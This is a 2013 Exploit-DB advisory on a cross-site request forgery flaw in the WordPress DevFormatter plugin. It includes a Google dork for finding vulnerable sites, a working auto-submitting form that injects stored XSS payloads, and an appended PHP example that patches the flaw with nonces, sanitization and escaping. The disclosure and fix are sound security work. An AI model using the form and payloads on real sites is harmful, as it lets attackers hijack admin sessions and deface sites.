WordPress Plugin Developer Formatter – Cross-Site Request Forgery

- Author: Junaid Hussain
- Date: 2013-01-22
- Category:
- Platform:
- Source: https://www.exploit-db.com/exploits/24294/

====================================================================================================================
# Exploit Title: WordPress Developer Formatter CSRF Vulnerability
# Google Dork: inurl:devformatter/devformatter.php
# Date: 21/01/13
# Author: Junaid Hussain -[ illSecure Research Group ] -
# Contact: illSecResearchGroup@Gmail.com | Website: illSecure.com
# Software Link: http://wordpress.org/extend/plugins/devformatter/
# Vendor: http://wordpress.org/extend/plugins/devformatter/
# Tested on: CentOS 5
# Version: WordPress Version 3.5, Should work on all versions.

====================================================================================================================
[#] Vulnerable Code
Page: devinterface.php - Line: 46
 <form method="post" action="options-general.php?page=devformatter/devformatter.php">
[#] no nonce given - Read: http://codex.wordpress.org/Function_Reference/wp_nonce_field
====================================================================================================================
// CSRF Exploit:
<html>
<body onload="javascript:document.forms[0].submit()">
<form method="post" action="http://[DOMAIN NAME]/wp-admin/options-general.php?page=devformatter/devformatter.php">
<input name="usedevformat" style="display:none;" type="checkbox" checked/>
<input name="copyclipboartext" type="text" style="display:none;" value="&lt;/textarea&gt;<script>alert(/xss/)</script>"/>
<input name="showtools" style="display:none;" type="checkbox" checked/>
<textarea name="devfmtcss" rows="6" cols="60" style="display:none;">
	body {
background-image: url('javascript:alert("XSS");') !important;
}
&lt;/textarea&gt;
 </form></html>
====================================================================================================================
[#] copyclipboartext & devfmtcss are both vulnerable to persistent XSS which could lead to cookie stealing,
malware distribution or even a defacement.
[#] Disclaimer: This exploit is for Research/Educational/Academic purposes only,
The Author of this exploit takes no responsibility for the way
you use this exploit, you are responsible for your own actions.
====================================================================================================================
Original: http://illsecure.com/code/Wordpress-DevFormatter-CSRF-Vulnerability.txt
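The root cause named in the advisory is the settings form on devinterface.php posting without a nonce, with the two text fields then stored unsanitized. The following is an added example, not the DevFormatter plugin's own code, of how a WordPress settings page closes both gaps: a capability check plus `wp_nonce_field()` / `check_admin_referer()` defeat the forged cross-site POST, and sanitization on save plus escaping on output remove the persistent XSS in `copyclipboartext` and `devfmtcss`. Field names are taken from the advisory; the option name `devfmt_settings`, the nonce action/field names and the `devfmt_*` function names are assumptions made for this example.

```php
<?php
// Added example (not the DevFormatter plugin's own code). Field names come from
// the advisory; option name, nonce action and function names are assumed.

define( 'DEVFMT_NONCE_ACTION', 'devfmt_save_settings' ); // assumed action name
define( 'DEVFMT_NONCE_FIELD',  '_devfmt_nonce' );        // assumed field name

// Register the settings page under Settings; WordPress itself enforces the
// 'manage_options' capability before calling the page callback.
add_action( 'admin_menu', function () {
    add_options_page( 'Developer Formatter', 'Developer Formatter',
        'manage_options', 'devformatter', 'devfmt_settings_page' );
} );

function devfmt_settings_page() {
    devfmt_handle_settings_post();
    devfmt_render_settings_form();
}

function devfmt_handle_settings_post() {
    if ( 'POST' !== $_SERVER['REQUEST_METHOD'] ) {
        return;
    }
    // 1. Capability check: only administrators may change plugin options.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // 2. CSRF check: check_admin_referer() validates $_REQUEST['_devfmt_nonce']
    //    against the action and dies with "Are you sure you want to do this?"
    //    if it is missing or stale. A third-party page cannot read the nonce,
    //    so an auto-submitting form like the one in the advisory is rejected.
    check_admin_referer( DEVFMT_NONCE_ACTION, DEVFMT_NONCE_FIELD );

    // 3. Sanitize on save. The two fields the advisory flags as persistent-XSS
    //    sinks are reduced to plain text / tag-free CSS before being stored.
    $settings = array(
        'usedevformat'     => isset( $_POST['usedevformat'] ) ? 1 : 0,
        'showtools'        => isset( $_POST['showtools'] ) ? 1 : 0,
        'copyclipboartext' => isset( $_POST['copyclipboartext'] )
            ? sanitize_text_field( wp_unslash( $_POST['copyclipboartext'] ) ) : '',
        'devfmtcss'        => isset( $_POST['devfmtcss'] )
            ? devfmt_sanitize_css( wp_unslash( $_POST['devfmtcss'] ) ) : '',
    );
    update_option( 'devfmt_settings', $settings );
    add_settings_error( 'devfmt_settings', 'saved', 'Settings saved.', 'updated' );
}

// Strip HTML and reject CSS constructs that can carry script in old browsers
// (javascript: URLs, expression(), behavior:, @import of remote sheets).
function devfmt_sanitize_css( $css ) {
    $css = wp_strip_all_tags( $css );
    if ( preg_match( '/(javascript\s*:|expression\s*\(|behavior\s*:|@import)/i', $css ) ) {
        return '';
    }
    return $css;
}

function devfmt_render_settings_form() {
    $s = wp_parse_args( get_option( 'devfmt_settings', array() ), array(
        'usedevformat' => 0, 'showtools' => 0, 'copyclipboartext' => '', 'devfmtcss' => '',
    ) );
    settings_errors( 'devfmt_settings' );
    ?>
    <form method="post" action="options-general.php?page=devformatter">
        <?php wp_nonce_field( DEVFMT_NONCE_ACTION, DEVFMT_NONCE_FIELD ); ?>
        <label><input name="usedevformat" type="checkbox" <?php checked( $s['usedevformat'] ); ?> />
            Use Developer Formatter</label><br />
        <label><input name="showtools" type="checkbox" <?php checked( $s['showtools'] ); ?> />
            Show tools</label><br />
        <!-- 4. Escape on output: esc_attr() neutralises quotes and angle brackets,
             esc_textarea() prevents a stored </textarea> from closing the element. -->
        <input name="copyclipboartext" type="text"
               value="<?php echo esc_attr( $s['copyclipboartext'] ); ?>" /><br />
        <textarea name="devfmtcss" rows="6" cols="60"><?php echo esc_textarea( $s['devfmtcss'] ); ?></textarea><br />
        <?php submit_button( 'Save Changes' ); ?>
    </form>
    <?php
}
```

With the nonce in place, the advisory's auto-submitting form still reaches the handler, but `check_admin_referer()` stops it before `update_option()` runs; even if a value did get stored, `esc_attr()` / `esc_textarea()` on output mean the stored `</textarea><script>` payload is rendered as text rather than markup.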